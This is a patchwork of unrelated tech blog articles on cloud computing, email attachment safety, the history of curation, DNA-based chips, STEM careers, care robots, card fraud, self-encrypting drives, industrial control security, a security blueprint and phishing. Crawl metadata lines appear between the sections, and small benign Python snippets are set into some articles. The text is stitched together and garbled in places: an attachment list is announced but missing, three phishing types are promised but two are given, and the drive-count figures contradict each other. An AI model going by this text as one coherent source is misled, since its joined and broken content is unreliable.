Cloud computing has been trending in the IT industry and has many advantages including lowering costs and improving flexibility, efficiency, and scalability. There are different types of cloud computing, each with different benefits, so choosing the type that best meets your organization's needs will set you up for success. But first, you need to understand what these options are and how they work.
What is Cloud Computing?
In contrast to using local servers or hardware, cloud computing is the use of remote servers to store and manage data. Cloud computing provides servers, data storage, databases, networking, software, analytics, and intelligence almost immediately. These services are accessed through the internet, enabling the user to have access from multiple devices, giving more flexibility. Since it also allows people to easily share data, cloud computing nurtures collaboration. If a power outage or technological malfunction occurs, having an external server allows the company to recover their data, which could have been lost if the hardware was damaged.
What are the Different Types of Cloud Computing?
Public clouds - Public clouds, like Google Drive and Microsoft Azure, are the most common type of cloud computing; they give the public access to resources over the web. Public clouds are not owned by the user, but rather by a third-party organization that develops the virtual space and manages and maintains the cloud. The consumer usually pays by the hour or by the byte, but some public clouds are free. Public cloud computing offers:
- higher security and performance
- lower costs
- wider availability of infrastructure, services, and applications
Private clouds - Private clouds are reserved for one business and are isolated from other users. All costs are managed by the company using the private cloud. This can be useful for companies that are unable to switch to public clouds because of security concerns, budgets, or regulations. In the healthcare and financial services industries, the features private clouds offer are particularly useful. A private cloud also allows the company to customize the cloud to best suit its needs. Private clouds can provide benefits such as:
- increased infrastructural capacity for large compute and storage demands
- on-demand services
- efficient resource allocations
- increased visibility into resources
Hybrid clouds - Hybrid clouds combine elements of both private and public cloud solutions on integrated infrastructure, allowing a business to combine the best elements of each model while keeping the two clouds integrated with each other. The benefits of hybrid cloud include:
- government and regulatory compliance
- stability and flexibility
- lower costs than a fully private cloud
Multicloud – Multicloud refers to one company using many unaffiliated clouds. Why would a company do this? Oftentimes, specific features are limited to specific clouds, so to enjoy all of these features, the company needs multiple clouds. Also, if one cloud provider loses the data or ends its operations, multicloud provides the company with a backup cloud. Through multicloud, companies use apps, resources, microservices, and containers from multiple cloud providers. There are many benefits to multicloud models:
- boosting performance
- avoiding vendor lock-in
- enhancing resilience
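The backup benefit described above can be sketched in code. In this hypothetical Python sketch, each provider is represented by a simple upload function; the provider names and functions are invented for illustration and do not correspond to any real cloud SDK:

```python
# Illustrative sketch only: the "provider" upload functions are stand-ins,
# not real cloud SDK calls.
def upload_with_failover(data, providers):
    """Try each (name, upload_fn) pair in order; return the name that succeeded."""
    last_error = None
    for name, upload in providers:
        try:
            upload(data)          # hand the payload to this provider
            return name
        except ConnectionError as exc:
            last_error = exc      # provider is down -- fall through to the next
    raise RuntimeError("all cloud providers failed") from last_error
```

If the primary provider is unreachable, the order of the list determines which backup cloud receives the data instead.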
Cloud computing is a worthwhile investment that makes data storage more convenient for a business. The different options allow for flexibility that empowers the company to choose the best cloud type for its needs. If you would like to learn more about cloud services and Kraft’s managed IT services, contact a Kraft IT Expert to schedule your free consultation today.
Why is understanding emails an important part of Cyber Security?
To put it simply, emails can be dangerous. They are one of the more basic and most effective ways of entering the closed networks of most companies. While effective anti-malware practice can prevent attachments from causing devastating effects, a lot of spam and malicious emails rely on unwitting employees to gain access to important and sometimes vital aspects of a business’ core systems.
Whilst reading the contents of emails is usually safe, the attachments within can pose a real threat. One of the most effective methods of preventing malicious activity is education. This guide covers what to look out for from email attachments, the sender and the content of the email as well as tips on good email practice.
So what should you look out for with Email Attachments?
The Attachment Extension
One of the easiest ways to identify whether an attached file is dangerous is by the file extension (the last few characters after the “.”), which tells you what type of file the attachment is. It is essential that no files with an “.exe” file extension are opened, as it indicates the attachment is a Windows executable program which could provide unrestricted system access if run. “.exe” files aren’t the only dangerous file type; other potentially dangerous file extensions include:
There are many more, and the list goes on. If you don’t recognise the file format – Do Not Open. Your IT team should never send you executable files, let alone any external parties. It is also important to understand that it is possible for the sender to change the extension of a file in order to disguise its true identity.
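The advice above can be expressed as a simple filter. The blocklist below is a short illustrative sample rather than a complete list, and a real mail gateway would combine an extension check with content inspection:

```python
import os

# Short illustrative sample -- real blocklists are far longer.
DANGEROUS_EXTENSIONS = {".exe", ".bat", ".cmd", ".scr", ".js", ".vbs", ".jar", ".msi"}

def is_risky_attachment(filename):
    """Flag a filename whose final extension is on the blocklist.

    The *last* extension is what the operating system acts on, which is
    why double-extension disguises such as "invoice.pdf.exe" still match.
    """
    _, ext = os.path.splitext(filename.lower())
    return ext in DANGEROUS_EXTENSIONS
```

Note that this catches only known-bad extensions; as the guide says, any format you don't recognise should still be treated with suspicion.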
A Brief History of Curation
Curation provides a solution to the problems engendered by big data — by surfacing quality over quantity
Broadly speaking, curation can be defined as “The act of organizing and maintaining a collection (such as artworks, artifacts, or data)”. As a society, we have a long history of curating content. The first examples of curated content emerged in Renaissance Europe, five centuries ago, in the form of newsletters. Handwritten newsletters circulated privately among merchants, passing along information about everything from economic conditions to social customs. The newsletter editor himself decided what information was the most important and most relevant, organizing and distributing that knowledge for public consumption.
Newsletters eventually matured into full-fledged newspapers. By the 1850s, publications such as the New York Times became the go-to source of news for information consumers. The editor served as an expert curator for consumers, determining what content was most factual, relevant and interesting for the masses. The newspaper editor wore the hat of content governor for consumer information.
In 1996 the Internet took off, and the New York Times went from a single printed edition to delivering two editions – one online and one offline publication. This change required organizational changes to adapt the New York Times to a world disrupted by new communications technology. The paper expanded its curation team from one editor to multiple editors and evaluated whether to merge or differentiate the online and offline publications. Eventually the popularity of online content pushed the New York Times to expand its notion of curation. No longer were expertly curated articles enough; there was a place for non-expert curation in the form of crowd-sourced content. The online edition of the New York Times introduced specific areas of the publication where aggregated content was curated according to popularity signals. Readers could easily find the “Most Emailed” and “Most Viewed” articles in sections of the paper devoted to communicating what content their readership was engaging with deeply.
Social media and crowd-sourced creation
Around the same time, social networks like Twitter, Pinterest, and Facebook introduced self-service techniques for content curation. On those platforms, individuals found published articles of interest or created their own content and shared it with their personal network of consumers. Features such as the “like” button allowed for social feedback on the appropriateness and value of the content shared.
In the modern world of crowd-sourced and socially curated content, there is always a risk that consumers accept anything online as fact. This presents a difficult challenge: How does one know what information online is accurate and what is not?
This leaves space for both expert curators to continue to play an important role in communications technology and for new features to be introduced that ensure information validity and maintain accuracy. One example is the use of annotations on a Wikipedia page with unknown sources. Annotations indicate the information on the page may not be accurate or needs updating but still allow for that content to be distributed.
From newspapers to social networks (such as Twitter, Pinterest, and Facebook), the introduction of new technologies has both introduced new methods of curation and expanded the breadth of individuals deemed fit to be curators.
In part two of this article, we’ll take a look at how there is now a growing demand to curate data and how the lessons learned from past curation can be applied to organizations struggling to deal with a huge influx of data.
IBM researchers are turning to DNA to create even smaller and more powerful computer chips.
IBM announced Aug. 17 that its scientists, teaming with others at the California Institute of Technology, are working on ways in which DNA molecules can be used to create a scaffolding onto which tiny circuits can be built.
Millions of carbon nanotubes could be placed onto the scaffolding and would then self-assemble into precise patterns by sticking to the DNA molecules. Those nanotubes would form the basis for transistors in processors.
The announcement comes as the semiconductor industry, including IBM and Intel, looks for ways to continue shrinking processors beyond the 22-nanometer limit, and the new advancements by IBM and CalTech hold the promise of enabling the companies to put more power and speed into smaller packages. These chips also will be more energy-efficient and less expensive to manufacture than current offerings, according to IBM.
Currently, chip makers are using 45-nm manufacturing processes and are moving toward 32 nm. As the trend moves to 22 nm and smaller, the challenges of performance, speed, energy efficiency and cost grow along with the technological challenges.
“The cost involved in shrinking features to improve performance is a limiting factor in keeping pace with Moore’s Law and a concern across the semiconductor industry,” Spike Narayan, manager of IBM Research’s Science and Technology business, said in a statement. “The combination of this directed self-assembly with today’s fabrication technology eventually could lead to substantial savings in the most expensive and challenging part of the chip-making process.”
CalTech had developed the ability to have single DNA molecules self-assemble in response to a reaction between a long single strand of viral DNA and a concoction of short synthetic oligonucleotide strands. The shorter segments fold the DNA into the desired shape, and can be modified to act as places for nanoscale components to attach, according to IBM Research.
Through this method, the nanostructures can be put into such shapes as squares, rectangles and triangles.
IBM and CalTech researchers will be publishing a paper on their work in the September issue of Nature Nanotechnology. The paper currently can be seen here.
Many people have heard of the STEM program but not everyone knows exactly what it entails. STEM is a curriculum based on the idea of educating students in four specific and critical areas — science, technology, engineering, and math — however, STEM does not separate these subjects to be taught individually; rather, they are integrated into a cohesive program that teaches the subjects together as complements to one another. One key point that the program is praised for is its use of real-world applications to train these students for their future careers — making it one of the most successful programs, resulting in some of the best-prepared students entering the workforce upon graduation.
More often than not, people think of high school or even college as the starting point for such technical and complex education to begin, but many schools have incorporated STEM into classes to some degree from kindergarten on up through high school! Of course, it is much more basic at the lower grades, but by including it in the curriculum from the beginning and adding to it incrementally as students grow, they will be much more interested in the subjects included in STEM. In addition to this, they will be able to notice the correlation between these subjects, which may result in higher numbers of these individuals choosing STEM-related careers. Notably, 58% of people currently working in STEM decided on this career path prior to graduating high school, meaning that early teaching is critical in creating future workers interested in STEM.
STEM is the second fastest-growing industry, second only to healthcare, with an expected 8.6 million jobs available in the field by 2018. Not only are graduates of STEM-related majors some of the highest paid young professionals right out of college, but they also get those high-paying jobs rather quickly following graduation. While these facts may be enticing, it is important for individuals to know about some of the potential successful careers they could have in their main area of interest when it comes to STEM.
Science & Engineering
Science and engineering careers are the most related when it comes to the workforce and make up 6 of the top 10 careers in STEM including civil engineering, environmental engineering technology, nuclear engineering technology, computer engineering (also related to technology), petroleum technology, and marine sciences. Among the requirements for these careers are strong problem solving skills, chemistry, basic math skills, and deductive and mathematical reasoning.
Mathematics itself, while an integral element in each of these careers, is not well represented in this top 10 list, making up only one of the listed STEM jobs. Despite this fact, mathematics encompasses a multitude of industries such as statistics, actuarial sciences, economics, and more that differentiate it from its fellow STEM categories. Required skills for mathematically related jobs include deductive and mathematical reasoning, problem-solving skills, and facility with numbers. If you love numbers and are interested in STEM, this might be the career path for you.
While science, engineering, and mathematics combine to make up the majority of the top jobs in STEM, technology is one of the fastest growing of these already rapidly rising industries and it affects its STEM counterparts significantly.
Advancements in existing technology, like smart-phones and computers, as well as the development of new technologies, such as IoT devices and connected car security, make it very apparent that a career in technology has a bright outlook for the future. Jobs are becoming much more technical now and require a better understanding of technology, so STEM programs have been more heavily emphasizing this segment of STEM in recent years.
Of Monster’s top 10 most valuable STEM careers, there are four related to technology: computer and information services, computer engineering (also related to engineering), computer programming, and the #1 most valuable STEM career: information technology. For these careers, there are multiple job titles including Information Security Analyst, Computer Systems Analyst, and Web Developer, among others. These jobs not only require knowledge of the latest technology, high analytical and developmental skills, and logical thinking, but a person seeking one of these jobs must be goal-oriented, passionate, and dedicated to advancing technology and growing the industry as he or she rises throughout a career in tech.
A common misconception about STEM is that it is all about the technical and analytical side of these complex careers, but STEM workers are also creators, innovators, and ground-breakers for the futures of each of their industries. Another fallacy surrounding STEM is that a student must receive traditional training and education in order to gain a successful career in STEM; however, there are alternative ways into a career in these fields.
Alternative Routes to a Career in STEM
Many people may look at the training and schooling necessary to attain a STEM-related degree and think that it is unaffordable, or that the resources and certifications required for their future careers are out of reach. However, there are companies that try to alleviate these fears by offering alternative routes for individuals who are interested in a career in technology but choose a different way to get there.
Axiom had the privilege earlier this year to work with IT Works, a Tech Impact program that offers free, immersive IT training to young adults – motivated high school graduates, age 18-26, who have not yet completed a Bachelor’s degree. As part of the 16-week training program, an IT Works student named William Lewis completed a 5-week internship with Axiom, and you can read about his experience interning for Axiom through IT Works here. A career in STEM is not necessarily about going to the highest-ranked technology school, but about being motivated enough to find your own way to where you want to be in your career, with the help of companies that can get you where you’re headed.
In case you’re still on the fence as to whether or not STEM education and careers are important, the National Science Foundation has this to say on the subject:
“In the 21st century, scientific and technological innovations have become increasingly important as we face the benefits and challenges of both globalization and a knowledge-based economy. To succeed in this new information-based and highly technological society, students need to develop their capabilities in STEM to levels much beyond what was considered acceptable in the past.”
With such a revolution in science, technology, engineering, and mathematics, the modern world is in great need of such advanced, pioneering minds as those interested in having an impact on these crucial subjects.
If you’re interested in learning more about STEM careers, please contact Axiom at https://axiomcyber.com/ to speak to one of our IT professionals about a career in tech. If you are in need of a different route of gaining technological experience and qualifications, please visit http://techimpact.org/ to learn more about their available programs for innovative and motivated individuals.
Hailey R. Carlson | Axiom Cyber Solutions | 9/16/2016
As a global leader in all things autonomous, it’s no surprise that Japan is looking to robotics to revolutionise social care. But in such a sensitive sector, the barriers to mass adoption may be psychological as much as technological.
The number of people in Japan aged 65 or older is expected to reach more than seven million by 2025. By that same point in time, the country predicts a shortfall of 370,000 caregivers. So in pure mathematical terms, a workforce of robots ready to fill the void has obvious potential.
However, the greatest challenge is likely to be encouraging communities to embrace the technology.
Relying on robots to restore independence
Robots have the potential to ease the burden on overstretched social care staff by restoring elderly citizens’ autonomy, believes Dr Hirohisa Hirukawa, director of robot innovation research at Japan’s National Institute of Advanced Industrial Science and Technology.
“Robotics cannot solve all of these issues; however, robotics will be able to make a contribution to some of these difficulties,” he said.
But there is still much to be done, as outlined in Japan’s overarching Robot Strategy. The report proposes that four out of every five care recipients will have some form of robotic support by 2020.
Currently, robots designed to help lift people in care facilities have been deployed in just eight per cent of the country’s nursing homes, for example.
Hirukawa sees plenty of room for improvement, both in terms of reducing the cost of the technology and fostering an atmosphere of acceptance towards it.
“The mindset of the people on the frontline of caregiving is that it must be human beings who provide this kind of care,” he said. “And on the side of those who receive care, of course initially there will be psychological resistance.”
Among the priorities for Japan’s social care robot development are lifting aids, mobility aids, wearable devices, and bots to support bathing and getting dressed.
Situational robots are preferred to all-around helpers. For example, one robotic mobility aid demonstrated by Hirukawa has built-in sensors that read the lie of the land. In this way, an elderly user could be assisted when on a steep incline, for example, while an automatic brake could help to reduce falls when going downhill.
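The downhill-braking behaviour described above can be sketched as a simple control rule. The thresholds and scaling below are invented for illustration; a real mobility aid would fuse several sensors and use far more careful control logic:

```python
def brake_command(slope_degrees, threshold=5.0, max_extra=15.0):
    """Map a tilt-sensor reading to a braking level in [0, 1].

    Negative slope means downhill. On level ground, uphill, or a gentle
    descent, no brake is applied; past the threshold, the brake is applied
    harder as the descent steepens, up to full braking.
    """
    if slope_degrees >= -threshold:
        return 0.0                            # level, uphill, or gentle slope
    overshoot = min(-slope_degrees - threshold, max_extra)
    return round(overshoot / max_extra, 2)    # proportional braking, capped at 1.0
```

The same pattern — sensor reading in, graded actuator command out — underlies the steep-incline assistance mentioned above, just with the assist motor in place of the brake.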
Plus: Wearable MRI offers speedy brain scans
In related medical news, San Francisco startup Openwater has unveiled a wearable device capable of scanning the brain with a resolution a billion times higher than traditional MRI machines.
The device has been designed to fit inside a simple hat and relies on optoelectronics to build a picture of the brain.
Openwater’s stated ambition is for the device to track the flow of oxygenated blood to different parts of the brain and, eventually, to read thoughts in real time.
Internet of Business says
As Malek Murison explains, some of the barriers to robotic social care and healthcare are local, cultural, and psychological, and there are risks in dehumanising the ways in which we look after vulnerable people.
But there are global reasons for automating some aspects of care, too. Japan is just one of a number of countries that are exploring the use of robotics, AI, and assistive technologies to help support an ageing population. In the UK, for example, the 65+ population will increase from 12 million today to 17 million by 2035. At the same time, investment in social care is falling in real terms by one-third. This is why robotic systems could complement human workers in the long term – despite the prohibitive costs at present.
Other technologies, such as autonomous vehicles, could help elderly or physically disabled people to lead more independent lives, outside of the traditional care system.
But first, specialist robots must overcome some serious technological challenges to work in health and social care. Among these are scene awareness, social intelligence, communication, data security, safe autonomy, safe failure, cleanliness, and validation by medical authorities. Last year, UK-RAS, the UK’s umbrella organisation for robotics and autonomous systems research, published an excellent white paper on the subject, which you can find here.
By Dr. Manfred Mueller and Louis Modell
Credit card fraud is as old as credit cards themselves. Since the introduction of the first plastic Diners Club card in the early 1950s, things have evolved rapidly.
Credit card fraud is a wide-ranging term for theft and fraud committed using or involving a payment card, such as a credit or debit card, as a fraudulent source of funds in a transaction. The purpose may be to obtain goods without paying, or to obtain unauthorized funds from an account. Many consumers and merchants associate the rise in online credit card fraud with identity theft. In reality, identity theft is one of the oldest scams in the book; it simply offers fraudsters another way to commit crimes and to hide them from detection.
Card Not Present (CNP)
The Internet and postal mail are the major routes for fraud against merchants who sell and ship products, and they severely affect legitimate mail-order and web merchants. If the card is not physically present (referred to as card not present, or CNP), the merchant must rely on the holder — or someone purporting to be the holder — to present the card information indirectly, whether by mail, telephone, or over the web. While there are safeguards in place, this is still riskier than an in-person transaction, and card issuers tend to charge a higher transaction rate for CNP because of the greater risk.
How Has the Internet Changed the Rules?
Thanks to the Internet, fraud scams are more efficient. The fraudster doesn’t have to travel to physical stores, or potential marks, to test or use stolen credit cards. They are, in effect, invisible criminals, masking themselves by faking the data points they send and making it easier for them to abuse banks and businesses. On the Internet, there is no live communication with a consumer. If the data looks suspicious, you have to either reject the order outright, accept it with the risk of fraud, or have someone investigate the order and try to get back in touch with the consumer — all very costly. At the same time, consumers doing business online expect fast turnarounds on their orders. So how can a merchant ever expect to win?
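The reject / accept / investigate decision described above is often automated as a first pass. The signals and thresholds in this sketch are invented for illustration; production systems rely on statistical models rather than a handful of hand-written rules:

```python
def triage_order(order):
    """Toy rule-based first pass over a card-not-present order.

    All signals and thresholds here are illustrative, not real fraud rules.
    """
    score = 0
    if order["billing_country"] != order["shipping_country"]:
        score += 2                  # mismatched addresses are a classic signal
    if order["amount"] > 500:
        score += 1                  # large orders carry more downside
    if order["failed_card_attempts"] > 2:
        score += 3                  # repeated declines suggest card testing
    if score >= 4:
        return "reject"
    if score >= 2:
        return "manual_review"      # the costly human-investigation path
    return "accept"
```

Automating the clear-cut cases lets merchants meet the fast turnarounds consumers expect, while reserving expensive human investigation for the genuinely ambiguous orders.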
What is an SED?
Drive Trust Alliance Definition of an SED:
- The device uses built in hardware encryption circuits to write and read data in and out of a non-volatile storage device such as a hard drive or a flash drive.
- At least one Media Encryption Key (MEK) is protected by at least one Key Encryption Key (KEK, usually a “password”).
- If one or more KEKs have not decrypted the MEK, the data that the MEK encrypts is not available to read or write. You cannot reverse engineer a locked SED without a valid KEK input from outside of the self-protecting SED.
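The MEK/KEK relationship can be illustrated with a toy sketch. Real SEDs do this in dedicated hardware with AES; the password-derived keystream below is not real cryptography, only a way to show that the data key is stored wrapped and is only recoverable with the right password:

```python
import hashlib
import hmac

def _keystream(key, length):
    # HMAC-SHA256 in counter mode: a toy stream cipher for illustration only.
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, counter.to_bytes(8, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]

def wrap_mek(mek, password, salt):
    """XOR the MEK with a keystream derived from the password (the KEK).

    XOR is symmetric, so the same call unwraps a wrapped MEK; the wrong
    password yields a different KEK and therefore garbage instead of the MEK.
    """
    kek = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return bytes(a ^ b for a, b in zip(mek, _keystream(kek, len(mek))))
```

Changing the drive password only re-wraps the small MEK; the data encrypted under the MEK never needs to be re-encrypted, which is also why cryptographic erase (discarding the MEK) is effectively instantaneous.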
SEDs are already ubiquitous worldwide
A well-kept secret is that SEDs are among the most successful and ubiquitous data leak protection security and privacy products in the world.
They are everywhere, but so easy to use once set up that you almost never see them or know they are working their magic. Note: 100% means 100% market penetration, while ~100% means approximately 100% market penetration. The sub-bullet under each item notes why the adoption took place.
- ~100% of all new, office and enterprise quality, Solid State Drives (SSDs) are TCG Opal SEDs
- Due to the Data Sanitization Problem for Flash
- ~100% of all Enterprise Storage (SSD, HDD, etc) are TCG Enterprise SEDs
- All of Google's storage of your data, and the data they hold on you, for instance.
- For fast, safe, and effective cryptographic repurposing and disposal of storage devices to protect against data leakage
- 100% of all Apple iOS devices are hardware SEDs for user data
- when an iPhone or iPad password is set, that password is the KEK
- ~100% Western Digital USB Hard Disk Drives (HDDs) are SEDs
- In case you lose your USB storage device
- ~100% of ALL Office-Class Printers and Copiers in the world use SEDs
- To protect against theft of what people have printed
- A much smaller number of personal HDDs are TCG Opal or other SEDs
- But Microsoft Bitlocker supports “eDrive” which requires Opal 2.0 SEDs
- 100% TCG Opal Drives also support the SATA Security Password (Hard Disk Password)
- No Software needed: already supported by BIOS/UEFI setup on nearly every laptop and PC in the world
- The newest fastest solid state drives, such as NVMe, and many other types of non-volatile storage devices are already commercially available as TCG SEDs, but standardization details are currently being handled by the TCG Storage Workgroup right now.
- Ease of use: Integral part of the drive electronics; security added IN, not ON.
- Transparency: comes from the factory already encrypting; no ON/OFF.
- Performance: operates at full drive speeds; no work slowdown.
- Efficacy: Gets the job done. SEDs are a mature and time-tested technology.
- Scalability: Already proven to scale smoothly from individual use to the largest distributed data centers in the world (e.g., Google).
Count all those SEDs up. That's right...
Billions of people use SEDs all the time and don't even know it. This includes you, right now. And the population of SED devices in the world is easily approaching a billion.
If you are not using SEDs right now for yourself or your organization, you should.
It is no secret that humans make mistakes. In order to reduce the damages and harms caused by human error, cyber security is a must for industrial control systems. Keep reading to learn more.
Unfortunately, humans make mistakes. There are many reasons behind this fact, such as the limited capacity of our working memory or our short attention span. Regardless of our experience, no matter how well trained we are, we all make mistakes, and it is okay. Mostly. Sometimes, human error leads to serious consequences and causes harm. In order to avoid such situations, implementing industrial control systems is essential. In this article, we will discuss what industrial control systems are and how they can be kept safe. Keep reading to learn more!
What are industrial control systems?
Industrial control system (ICS) is an umbrella term that refers to supervisory control and data acquisition (SCADA) systems, programmable logic controllers (PLCs), distributed control systems (DCSs), and similar technologies.
Industrial control systems aim to streamline various business practices related to industrial production, but most importantly, they reduce the human error rate through optimization. Industrial control systems are often employed in critical industrial facilities like thermal plants, power generation stations, heavy industry, distribution systems, nuclear plants, and water treatment facilities.
Why are industrial control systems necessary?
As we have mentioned before, human error is almost inevitable. In order to alleviate the stress and reduce the risks related to human error, industrial control systems were developed.
Industrial control systems aim to offer distributed control, process automation and process monitoring.
With distributed control, it is possible to reduce vulnerabilities and risk factors associated with industrial production. Efficiency benefits greatly from it as well.
Process automation allows employees to work faster and get more work done in a given time. Moreover, it enables the production of better-quality materials and significantly lowers production costs.
And finally, process monitoring is necessary to make sure that everything goes smoothly. It allows the supervisors to control the production processes and make adjustments when necessary.
Why do we need cybersecurity for industrial control systems?
The history of industrial control systems goes back a long way, well before the Internet of Things and similar technological developments. As a result, industrial control systems were designed to operate in highly isolated and controlled environments. Initially, they were only connected to other systems within the same factory or plant, and specialized control mechanisms and communication protocols were created for this purpose. Yet such mechanisms and protocols cannot meet the requirements of today's business environments, and they do not integrate well with recent technologies like big data analytics and the Internet of Things (IoT). To bring industrial control systems up to date with current business needs, real-time data and enterprise networks have been introduced.
Real-time data and enterprise networks can do wonders for an industrial plant or factory, but they bring new vulnerabilities as well. That is why cybersecurity for industrial control systems is a must. Thorough and carefully planned cybersecurity measures are essential for protecting plants and factories from external disruption, data breaches, and serious catastrophes.
Threats to information technology infrastructures are becoming increasingly sophisticated, with malicious applications, weaponized email attachments, and socially engineered malware all growing in both number and capability. Organizations must take a multi-layered approach to detecting and defending against attacks and intrusions in this changing threat landscape, and there are key security measures every company should employ to develop and maintain strong security.
This is a blueprint of the minimum recommended technologies that, when properly implemented, reduce overall risk, regardless of which manufacturer you choose for each technology.
Traditional firewalls can perform the most basic gatekeeping tasks including opening and blocking ports, translating network addresses, and governing outbound traffic.
Many of today’s threats, however, can evade these safety measures, creating the need for more advanced firewall functionality. A next-generation firewall enhances primary protection capabilities and provides more thorough security with a number of sophisticated features including:
- Intrusion prevention systems that continuously monitor networks for interference with normal traffic, security breaches, and other undesirable activities.
- SSL and SSH inspection that identifies and blocks connections established by malware for the purpose of uploading sensitive data or downloading harmful material. Additionally, more and more sites are defaulting to HTTPS, which reduces the amount of traffic a traditional firewall can see unless it is able to inspect SSL traffic.
- Anti-malware protection that’s connected to a constantly updated global threat center.
- Application awareness that analyzes the traffic generated by each application to identify abnormalities.
Although a username and password are two of the most common forms of authentication, the rise of security breaches in recent years has proven that they simply are not enough. In part, this is because of weak password practices and reliance on only one class of credentials: knowledge.
Authentication factors are distinct categories of credentials that can, alone or together, verify the identity of a user. The two basic classifications are knowledge factors, or something the user knows, such as security questions, usernames, and passwords, and possession factors, or something the user has, such as a key card. The third category is inherence factors, which are things that are unique to the user, including biometrics such as fingerprints. The most advanced systems also monitor and analyze the times a user interacts with the system and the locations from which they do so as additional factors.
Two-factor authentication is most useful when the factors come from two different categories. Using this approach offers greater protection from theft of credentials and reduces the risk of a breach from phishing and social engineering schemes.
Secure Mobile and Remote Access
Businesses are also tasked with protecting resources on virtual networks when users need to access them from outside of the organization. While the firewall often handles this duty, it may not be sufficient beyond about 50 concurrent VPN users.
In these cases, organizations should look into a VPN concentrator. This virtual or physical device is a dedicated VPN gateway outside of the router or firewall that focuses specifically on mobile and remote access and traffic.
It’s equally important to ensure proper authentication of the mobile devices used to access a network so two-factor authentication is highly recommended. Biometric methods work especially well on mobile devices, with many being capable of fingerprint, facial and voice recognition as well as iris scanning. GPS can also be used to verify the user’s location, creating a simple but effective two-factor authentication protocol.
With email phishing and attachment-based ransomware on the rise, filtering malicious emails before they even appear in the inbox is the first step in email security. Incoming emails can be scanned for indicators of social-engineering designed to trick the receiver into revealing sensitive information.
Once threats are detected, they can be quarantined or otherwise rendered harmless. Links within emails can be monitored as well with applications that examine the URLs and the sites they point to. If malicious sites are discovered, the system prevents users from even opening the links.
Advanced Persistent Threat Detection
Advanced Persistent Threats utilize stealth to evade security barriers including anti-malware programs and firewalls. APTs can cause considerable damage as they are engineered to work quietly in the background over long periods of time, gathering and sending information as well as destabilizing the IT infrastructure to allow more malware through.
Sandboxes and emulators can help fight against these silent attackers by creating a virtual environment that seems just like the real thing and placing suspicious applications into them before they can reach the actual IT structure.
These tools then monitor the activity of the applications for signs of rogue behavior and quarantine any malicious items.
Data Protection and Encryption
Implementing proper file, folder, and hard drive encryption policies not only reduces the risk of data being accessed and extracted by unauthorized parties but renders the information unreadable even if it is exfiltrated. Depending on the type and scope of data that needs to be protected, encryption can be applied via hardware and operating system services, dedicated applications, or drivers.
Users will not be able to read the data without the proper credentials, which should include at least two authentication factors.
Identity Management and Governance
Monitoring and protecting superuser and admin accounts for servers, databases, VMware/Hyper-V consoles, SaaS applications, and other parts of an organization’s IT environment requires effective privileged identity management. PCI DSS 3.2 adds multi-factor authentication as a requirement for any personnel with non-console administrative access to the systems handling card data, so that a password alone is not enough to verify the user’s identity and grant access to sensitive information.
Developing a reliable identity governance policy to centralize orchestration of user identity management and access control is also key. With proper active directory practices, businesses will ensure that only current employees are active and that those employees only have permissions specific to their job role.
This can also verify that the activity is originating from expected regions or IP locations.
Implementing this blueprint will provide a good foundation and structure, but it is by no means the final result. Proper configuration, monitoring, and patching are still critical practices to ensure your tools are working properly. Additionally, educating your associates is a great next step.
However, with these suggestions properly in place, you will have greater visibility into your environment, stronger access control, and the ability to then make strategic additions as necessary for your specific environment.
Ready to up your security game?
Our security experts are here to help you every step of the way. Connect with us to start developing the right blueprint for your organization. | <urn:uuid:9b8db340-05d8-43fa-99b2-40c27c15b4c3> | CC-MAIN-2022-40 | https://microage.com/blog/security-architecture-blueprint/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00165.warc.gz | en | 0.932246 | 1,363 | 2.71875 | 3 |
Worry less while driving! Autonomous cars utilize Machine Learning to detect potential hazards and alert the driver to minimize risks while on the road. The car is able to identify roadway lanes and types, other cars, pedestrians, and cyclists in its surroundings.
In this video, we showcase how the car senses and alerts the driver while travelling on busy highways and through winding roads. This model was created in Python using a convolutional neural network (CNN) built with libraries such as TensorFlow and OpenCV.
Insights Hub is a video series brought to you by Miracle's Data Practice. For more videos please visit http://www.miraclesoft.com/insighthub | <urn:uuid:778c6066-e11c-4455-9c79-922a23297f3b> | CC-MAIN-2022-40 | https://uat.miraclesoft.com/library/video/autonomous-car-ai-powered-vehicle-using-machine-learning | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336921.76/warc/CC-MAIN-20221001195125-20221001225125-00165.warc.gz | en | 0.946613 | 129 | 3.25 | 3 |
What Is Phishing?
Are you sure it was your bank that just emailed you? Can you feel confident that you’re clicking on a safe link? Or are you about to become the latest victim of a phishing scam?
Phishing is a creative attack that's been fooling people for years. A successful phishing attack can put your data and your money in the hands of criminals and leave your devices riddled with malware and viruses.
Here’s everything you need to know about how to spot phishing scams and how to protect yourself against them.
What is phishing?
You can probably guess where the name comes from. The word “phishing” is a reference to the way in which the scam is carried out: baiting, luring, and reeling in a victim. The criminal is holding the rod, and yes, you’ve guessed it – you're the fish.
There are several different kinds of phishing techniques. The most common methods involve email, although in more elaborate phishing attacks, that is just the start.
For phishing emails, disguise is essential. The criminal will pose as a trusted contact, a friend, or a legitimate company. They'll dress their message up accordingly, with an eye-catching subject line and all the trappings of a genuine email.
Types of phishing
Here are three of the most common types of phishing.
Perhaps the most famous iteration of direct extortion is the so-called “Nigerian Prince” scam. It relies on the criminal starting a conversation with the victim and eventually convincing them to transfer money. This often involves the attacker, in the guise of a wealthy man overseas, promising a massive payoff in return for a “small” investment of funds.
In recent years, some criminals have started targeting people through dating apps. After gaining trust and convincing the victim of their genuine interest, phishers can create a false scenario in which they urgently need money.
Admittedly, awareness of these scams has increased in recent years, so fewer people are falling victim.
In some phishing scams, that initial email is just the starting point for a more elaborate crime.
The setup is the same as the dangerous link email, but in this case, the link will take potential victims to a webpage specifically designed by the criminal. This page will use the same theme and disguise as the email. If someone is pretending to be your bank, asking you to reset your login details, the page will mimic the colors and layout of that bank.
Then, if you end up inputting the requested data – passwords or card credentials – the information will be unencrypted and visible to the criminal.
Types of phishing attacks
Phishing attacks come in a variety of shapes and forms. The main difference between most types of phishing attacks is the medium over which they are carried out. Here are some of the most common types.
Email phishing is arguably the most common type of phishing. As the name suggests, the attack is carried out via email. Usually, emails crafted by bad actors imitate legitimate sources to fool unsuspecting users into giving up their sensitive information.
The essential difference between spear phishing and other types of phishing attacks is that in a spear phishing attack, the bad actors focus with high precision on a single target. In most instances, the targets are specific people or organizations.
